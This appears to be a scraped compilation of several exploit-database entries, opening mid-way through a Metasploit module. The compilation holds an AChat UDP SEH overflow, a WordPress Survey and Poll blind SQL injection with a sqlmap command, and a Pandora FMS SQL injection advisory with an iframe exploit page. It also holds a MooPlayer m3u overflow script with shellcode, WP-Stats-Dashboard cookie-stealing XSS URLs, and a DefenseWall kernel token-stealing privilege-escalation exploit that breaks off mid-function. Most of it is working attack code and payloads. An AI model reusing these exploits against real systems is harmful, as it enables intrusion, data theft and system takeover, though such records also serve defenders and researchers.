          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2014'))

    register_options(
      [
        Opt::RPORT(9256)
      ], self.class)
  end

  def exploit
    connect_udp

    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # mov eax, ebp
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 05 00140011      ADD EAX,11001400         # adjusting eax
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 50               PUSH EAX                 # eax points to the start of the shellcode
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # padding
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 59               POP ECX                  # padding
    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"

    sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
    sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
    sploit << "\x61\x40" # POPAD + INC EAX

    sploit << target.ret # AChat.exe p/p/r address

    # adjusting the first thread's unicode payload, tricky asm-fu
    # the first seh exception jumps here, first_stage variable will be executed
    # by the second seh exception as well. It needs to be in sync with the second
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
    # payload, then first_stage variable will take the rest of the job.
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 55               PUSH EBP                 # ebp with close pointer to payload
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # put ebp to eax
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
    # 05 00140011      ADD EAX,11001400         # more adjusting
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 50               PUSH EAX			# saving eax
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 5D               POP EBP			# mov ebp, eax
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
    sploit << "\x00" + 'A' * 10 + "\x00"

    i = 0
    while i < sploit.length do
      if i > 172000
        Rex::sleep(1.0)
      end
      sent = udp_sock.put(sploit[i..i + 8192 - 1])
      i += sent
    end
    disconnect_udp
  end

end
HireHackking 
#################################################################
# Exploit Title : Wordpress Survey and poll Blind SQL Injection

# Data : 2015 – 02 - 11

# Exploit Author : Securely (Yoo Hee man)

# Plugin : WordPress Survey and Poll

# Vender Homepage : http://modalsurvey.sympies.com

# Tested On : Windows XP / sqlmap_v1.0

# Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip
                  https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on)

1. Detail 
- This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php
- Settings.php file is no login cookie check
- "survey_id" variable is not sanitized


#################################################################
public function ajax_survey()
    {
		global $wpdb;
		$survey_id = "";
		$survey_name = "";
		$survey_start_time = "";
		$survey_expiry_time = "";
		$survey_global = "";
		if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']);
		else $survey_id = "";
		if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']);
		else $survey_name = "";
		if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time']));
		else $survey_start_time = "";
		if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time']));
		else $survey_expiry_time = "";
		if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']);
		else $survey_global = "";
		if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']);
		else $survey_options = "";
		if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']);
		else $survey_qa = "";
		$survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id);
		if ($_REQUEST['sspcmd']=="save")
		{
		if ($survey_check>0) {
		//update survey
			$wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id));
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'count' => $oans[1],
							'autoid' => $key
							) );					
						}
					
					}
				}
			die("updated");
		}
		else {
		//insert survey
			$wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 
				'id' => $survey_id, 
				'name' => $survey_name, 
				'options' => $survey_options, 
				'start_time' => $survey_start_time,
				'expiry_time'=> $survey_expiry_time,
				'global'=> $survey_global
				) );
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'autoid' => $key
							) );					
						}
					
					}
				}
			die('success');
		}
################################################################

2. POC
- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]
- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]

3. Sqlmap
- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql


3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                   god2zuzu@naver.com
HireHackking 
Document Title:
===============
Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1355


Release Date:
=============
2015-02-09


Vulnerability Laboratory ID (VL-ID):
====================================
1355


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement 
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ 
new technology market. 

    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.


    * Get SNMP Traps from generic network devices. 
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module. 
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction. 
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerability in the official Pandora FMS monitoring web-application.


Vulnerability Disclosure Timeline:
==================================
2015-02-09:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Artica Sulociones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Pandora FMS v5.1 SP1 monitoring web-application.
The vulnerability allows remote attackers and low privileged application user accounts to unauthorized execute sql commands 
that compromise the affected monitoring web-application and dbms.

The vulnerability is located in the offset value of the index list context module. Remote attackers and low privileged application 
user accounts are able to execute own sql commands via GET method request. The attacker can prepare a request through the `agentes` 
module to inject own sql commands on the affected web-application dbms.

The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 6.3.
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] agentes
				[+] agents_modules

Vulnerable Parameter(s):
				[+] offset


Proof of Concept (PoC):
=======================
The sql injection web vulnerabilities can be exploited by local low privileged application user accounts in godmode without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC:
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60
http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--


--- SQL Error Session Logs ---
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 1 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 28 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY utimestamp DESC LIMIT 10' at line 4 ('SELECT * FROM tevento WHERE id_agente = -1' AND estado <> 1 ORDER BY utimestamp DESC LIMIT 10') in /var/www/html/pandora/include/db/mysql.php on line 74
-
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ('SELECT notinit_count FROM tagente WHERE id_agente = -1'') in /var/www/html/pandora/include/db/mysql.php


PoC: Exploit (html & js)

<html>
<head><body>
<title>Pandora FMS - SQL Injection Exploit</title>
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60>
<iframe src=http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'-->
<iframe src=http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
</head></body>
</html>

... or

<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EPandora%20FMS%20-%20SQL%20Injection%20Exploit%3C/title%3E%0A%3Ciframe%20src%3D
http%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26refr%3D60%26group_id%3D0%26search%3D%26sort_field%3D
%26sort%3Dnone%26status%3D0%26offset%3D-1%2527-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D2592000%26refresh%3DRefresh%2520path%26offset%3D-1%2527-%5B
SQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26
group_id%3D0%26search%3D%26sort_field%3D%26sort%3Dnone%26status%3D-1%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%26refr%3D60%3E%0A%3Ciframe%20src%3Dhttp%3A
//fms.localhost%3A8080/pandora/index.php%3F%26sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D-%5BSQL%20INJECTION%20
VULNERABILITY%21%5D%27--%26refresh%3D%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
sec%3Destado%26sec2%3Doperation/agentes


Reference(s):
http://fms.localhost:8080/pandora/index.php
http://fms.localhost:8080/pandora/include/db/mysql.php


Solution - Fix & Patch:
=======================
The issue can be patched by implementation of a prepared statement thats prevents the execution of sql commands through the weak values.
Encode and parse the vulnerable `offset` value in  all the marked moduzles to prevent further executions or information disclosure.


Security Risk:
==============
The security risk of the remote sql injection vulnerabilitiy in the pandora fms application is estimated as high. (CVSS 6.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH 



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
#!/usr/bin/env python
#################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow      #
# Date Discovered: 10-02-2015                                   #
# Author: dogo h@ck                                             #
# Vulnerable Software: Moo player 1.3.0                         #
# Software Link: https://mooplayer.jaleco.com/                  #
# Version: 1.3.0                                                #
# Tested On: Windows XP SP3                                     #
#################################################################
#BadCharacters = ("\x00\x0a\x0d")                               #
#################################################################

head="http://"
buffer=10000
junk = "\x41" * 264
nseh = "\xeb\x06\x90\x90" 
seh = "\xe2\x69\xc8\x74"  #74C869E2 OLEACC.dll || Path=C:\WINDOWS\system32\OLEACC.dll

# Windows XP SP3 English MessageBoxA Shellcode

shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x51\x68\x6c\x6c\x20\x20\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72"
"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" # 0x7c801d7b ; LoadLibraryA(user32.dll)
"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
"\xc1\x11\x11\x11\x11\x51\x68\x61"
"\x67\x65\x42\x68\x4d\x65\x73\x73"
"\x89\xe1\x51\x50\xbb\x40\xae\x80" # 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
"\x51\x51\x52\xff\xd0\x31\xc0\x50"
"\xb8\x12\xcb\x81\x7c\xff\xd0")

poc = head + junk + nseh + seh + shellcode
junk1 = "\x44"*(buffer-len(poc))
poc += junk1
file = "payload.m3u"
f=open(file,"w")
f.write(head + poc);
f.close();
HireHackking 
source: https://www.securityfocus.com/bid/49197/info

WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]
HireHackking 
/*

Exploit Title    - SoftSphere DefenseWall FW/IPS Arbitrary Write Privilege Escalation
Date             - 10th February 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://www.softsphere.com
Tested Version   - 3.24
Driver Version   - 3.2.3.0 - dwall.sys
Tested on OS     - 32bit Windows XP SP3 
OSVDB            - http://www.osvdb.org/show/osvdb/117996
CVE ID           - CVE-2015-1515
Vendor fix url   - 
Fixed Version    - no fix
Fixed driver ver - 

*/


#include <stdio.h>
#include <windows.h>

#define BUFSIZE 4096


typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
     HANDLE  Section;
     PVOID   MappedBase;
     PVOID   Base;
     ULONG   Size;
     ULONG   Flags;
     USHORT  Index;
     USHORT  NameLength;
     USHORT  LoadCount;
     USHORT  PathLength;
     CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
 
typedef struct _SYSTEM_MODULE_INFORMATION {
     ULONG   Count;
     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS { 
     SystemModuleInformation = 11,
     SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
     SYSTEM_INFORMATION_CLASS SystemInformationClass,
     PVOID SystemInformation,
     ULONG SystemInformationLength,
     PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
     DWORD ProfileSource, 
     PULONG Interval);

typedef void (*FUNCTPTR)(); 



// Windows XP SP3

#define XP_KPROCESS 0x44      // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8      // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88      // Offset to ActiveProcessLinks _EPROCESS struct


BYTE token_steal_xp[] =
{
  0x52,                                                  // push edx                       Save edx on the stack
  0x53,	                                                 // push ebx                       Save ebx on the stack
  0x33,0xc0,                                             // xor eax, eax                   eax = 0
  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]         Retrieve ETHREAD
  0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax
  0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]        Retrieves TOKEN
  0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                     ---- 
  0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]        Retrieves TOKEN and stores on EDX
  0x8b,0xc1,                                             // mov eax, ecx                   Retrieves KPROCESS stored on ECX
  0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
  0x5b,                                                  // pop ebx                        Restores ebx
  0x5a,                                                  // pop edx                        Restores edx
  0xc2,0x08                                              // ret 8                          Away from the kernel    
};



DWORD HalDispatchTableAddress() 
{
    _NtQuerySystemInformation    NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION   pModuleInfo;
    DWORD                        HalDispatchTable;
    CHAR                         kFullName[256];
    PVOID                        kBase = NULL;
    LPSTR                        kName;
    HMODULE                      Kernel;
    FUNCTPTR                     Hal;
    ULONG                        len;
    NTSTATUS                     status;


    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
 	
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return -1;  
    }

    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);

    if (!status) 
    {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
        return -1;
    }
		
    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);

    if(pModuleInfo == NULL)
    {
        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
        return -1;
    }

    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
	
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;

    printf("[i] Kernel base name %s\n", kFullName);
    kName = strrchr(kFullName, '\\');

    Kernel = LoadLibraryA(++kName);

    if(Kernel == NULL) 
    {
